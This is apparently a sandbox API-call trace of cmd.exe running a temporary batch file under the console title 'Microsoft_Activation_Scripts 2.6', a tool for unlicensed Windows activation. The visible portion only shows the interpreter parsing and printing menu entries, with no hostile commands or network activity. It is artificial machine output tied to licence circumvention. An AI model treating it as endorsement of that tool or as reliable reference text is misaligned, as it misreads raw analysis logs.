_wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.967] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.967] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.967] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.967] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.967] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.967] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.967] GetLastError () returned 0x7b [0180.967] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.968] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.968] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.968] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.968] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.968] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.968] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.968] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.968] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.968] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.968] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.968] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.968] GetProcessHeap () returned 0x19a8f1e0000 [0180.968] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1e5550 [0180.968] GetProcessHeap () returned 0x19a8f1e0000 [0180.968] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa0) returned 0x19a8f2003a0 [0180.968] GetProcessHeap () returned 0x19a8f1e0000 [0180.968] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f2003a0, Size=0x42) returned 0x19a8f1f8f00 [0180.968] GetProcessHeap () returned 0x19a8f1e0000 [0180.968] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f8f00) returned 0x42 [0180.968] GetProcessHeap () returned 0x19a8f1e0000 [0180.968] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x62) returned 0x19a8f1e55c0 [0180.969] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [5] Activation Status\r\n") returned 36 [0180.969] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.969] GetFileType (hFile=0x24) returned 0x2 [0180.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.969] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.969] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.969] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x24) returned 1 [0180.971] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.971] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.974] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.974] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.975] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.975] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.975] SetConsoleInputExeNameW () returned 0x1 [0180.975] GetConsoleOutputCP () returned 0x1b5 [0180.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.975] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.976] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.976] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.976] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.976] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9779, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2633 [0180.976] GetProcessHeap () returned 0x19a8f1e0000 [0180.977] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e55c0) returned 1 [0180.977] GetProcessHeap () returned 0x19a8f1e0000 [0180.977] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8f00) returned 1 [0180.978] GetProcessHeap () returned 0x19a8f1e0000 [0180.978] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5550) returned 1 [0180.978] GetProcessHeap () returned 0x19a8f1e0000 [0180.978] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ac0) returned 1 [0180.978] GetProcessHeap () returned 0x19a8f1e0000 [0180.978] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0180.979] GetProcessHeap () returned 0x19a8f1e0000 [0180.979] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0180.979] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.979] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2633 [0180.979] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.980] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9815, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2657 [0180.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [6] Troubleshoot\r\n", cbMultiByte=36, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [6] Troubleshoot\r\ntus\r\n___________________________ \r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 36 [0180.980] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.980] GetFileType (hFile=0xa0) returned 0x1 [0180.980] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.980] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2657 [0180.980] GetProcessHeap () returned 0x19a8f1e0000 [0180.980] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.981] GetProcessHeap () returned 0x19a8f1e0000 [0180.981] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.982] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.982] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.982] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.982] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.982] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.982] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.982] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.982] GetProcessHeap () returned 0x19a8f1e0000 [0180.982] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0180.982] GetProcessHeap () returned 0x19a8f1e0000 [0180.982] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.982] GetProcessHeap () returned 0x19a8f1e0000 [0180.982] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8940 [0180.982] _tell (_FileHandle=3) returned 9815 [0180.982] _close (_FileHandle=3) returned 0 [0180.982] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.982] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.982] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.983] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.983] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.983] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.983] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.983] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.983] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.983] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.983] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.983] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.983] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.983] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.983] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.983] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.983] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.983] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.983] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.983] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.983] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.983] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.983] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.983] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.983] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.983] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.983] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.983] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.984] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.984] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.984] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.984] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.984] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.984] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.984] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.984] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.984] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.984] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.984] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.984] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.984] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.984] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.984] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.984] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.984] GetLastError () returned 0x7b [0180.984] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.985] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.985] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.985] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.985] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.985] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.985] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.985] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.985] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.985] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.985] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.985] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.985] GetProcessHeap () returned 0x19a8f1e0000 [0180.985] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1f8760 [0180.985] GetProcessHeap () returned 0x19a8f1e0000 [0180.986] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8c) returned 0x19a8f202600 [0180.986] GetProcessHeap () returned 0x19a8f1e0000 [0180.986] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f202600, Size=0x38) returned 0x19a8f1e0970 [0180.986] GetProcessHeap () returned 0x19a8f1e0000 [0180.986] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0970) returned 0x38 [0180.986] GetProcessHeap () returned 0x19a8f1e0000 [0180.986] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f86a0 [0180.986] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [6] Troubleshoot\r\n") returned 31 [0180.986] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.986] GetFileType (hFile=0x24) returned 0x2 [0180.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.986] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.986] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.986] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x1f, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x1f) returned 1 [0180.990] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.990] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.990] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.990] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.990] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.990] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.991] SetConsoleInputExeNameW () returned 0x1 [0180.991] GetConsoleOutputCP () returned 0x1b5 [0180.991] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.991] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.992] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.992] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.992] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.992] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9815, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2657 [0180.992] GetProcessHeap () returned 0x19a8f1e0000 [0180.993] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0180.993] GetProcessHeap () returned 0x19a8f1e0000 [0180.993] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0970) returned 1 [0180.993] GetProcessHeap () returned 0x19a8f1e0000 [0180.993] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8760) returned 1 [0180.993] GetProcessHeap () returned 0x19a8f1e0000 [0180.994] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8940) returned 1 [0180.994] GetProcessHeap () returned 0x19a8f1e0000 [0180.994] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0180.994] GetProcessHeap () returned 0x19a8f1e0000 [0180.994] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0180.994] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.994] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2657 [0180.994] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.994] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9845, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2675 [0180.995] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [7] Extras\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [7] Extras\r\nhoot\r\ntus\r\n___________________________ \r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 30 [0180.995] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.995] GetFileType (hFile=0xa0) returned 0x1 [0180.995] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.995] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2675 [0180.995] GetProcessHeap () returned 0x19a8f1e0000 [0180.995] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.995] GetProcessHeap () returned 0x19a8f1e0000 [0180.995] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.996] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.996] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.996] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.996] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.996] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.996] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.996] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.996] GetProcessHeap () returned 0x19a8f1e0000 [0180.996] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0180.996] GetProcessHeap () returned 0x19a8f1e0000 [0180.996] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.996] GetProcessHeap () returned 0x19a8f1e0000 [0180.996] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f8f50 [0180.996] _tell (_FileHandle=3) returned 9845 [0180.996] _close (_FileHandle=3) returned 0 [0180.996] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.996] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.997] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.997] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.997] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.997] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.997] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.997] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.997] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.997] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.997] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.997] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.997] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.997] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.997] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.997] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.997] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.997] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.997] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.997] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.997] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.997] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.997] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.997] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.997] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.997] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.998] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.998] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.998] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.998] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.998] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.998] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.998] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.998] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.998] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.998] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.998] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.998] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.998] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.998] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.998] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.998] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.998] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.998] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.998] GetLastError () returned 0x7b [0180.999] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.999] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.999] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.999] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.999] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.999] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.999] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.999] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.999] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.999] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.999] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0181.000] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0181.000] GetProcessHeap () returned 0x19a8f1e0000 [0181.000] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4a) returned 0x19a8f1f8be0 [0181.000] GetProcessHeap () returned 0x19a8f1e0000 [0181.000] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1ef7a0 [0181.000] GetProcessHeap () returned 0x19a8f1e0000 [0181.000] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ef7a0, Size=0x2c) returned 0x19a8f1e0c70 [0181.000] GetProcessHeap () returned 0x19a8f1e0000 [0181.000] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0c70) returned 0x2c [0181.000] GetProcessHeap () returned 0x19a8f1e0000 [0181.000] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8760 [0181.000] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [7] Extras\r\n") returned 25 [0181.000] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.000] GetFileType (hFile=0x24) returned 0x2 [0181.000] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0181.000] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0181.001] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.001] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x19) returned 1 [0181.002] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.002] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.003] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.005] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.006] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.006] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.006] SetConsoleInputExeNameW () returned 0x1 [0181.006] GetConsoleOutputCP () returned 0x1b5 [0181.006] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.007] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.007] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0181.007] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0181.007] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.007] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9845, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2675 [0181.007] GetProcessHeap () returned 0x19a8f1e0000 [0181.008] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8760) returned 1 [0181.008] GetProcessHeap () returned 0x19a8f1e0000 [0181.009] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0c70) returned 1 [0181.009] GetProcessHeap () returned 0x19a8f1e0000 [0181.010] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8be0) returned 1 [0181.010] GetProcessHeap () returned 0x19a8f1e0000 [0181.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8f50) returned 1 [0181.011] GetProcessHeap () returned 0x19a8f1e0000 [0181.011] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0181.011] GetProcessHeap () returned 0x19a8f1e0000 [0181.012] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0181.012] _get_osfhandle 